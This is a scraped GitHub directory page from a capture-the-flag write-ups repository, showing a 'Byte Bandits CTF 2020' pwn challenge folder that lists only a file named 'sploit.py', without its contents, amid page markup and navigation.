<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Byte%20Bandits%20CTF%202020/pwn/write","user_id":null}}" data-hydro-click-hmac="fc5ebf69834d2b5b04ecdc8767a226fb82772cd15fd9163045a8968bce2552cc"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Byte Bandits CTF 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>write<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Byte Bandits CTF 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>write<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Byte%20Bandits%20CTF%202020/pwn/write" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Byte%20Bandits%20CTF%202020/pwn/write"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
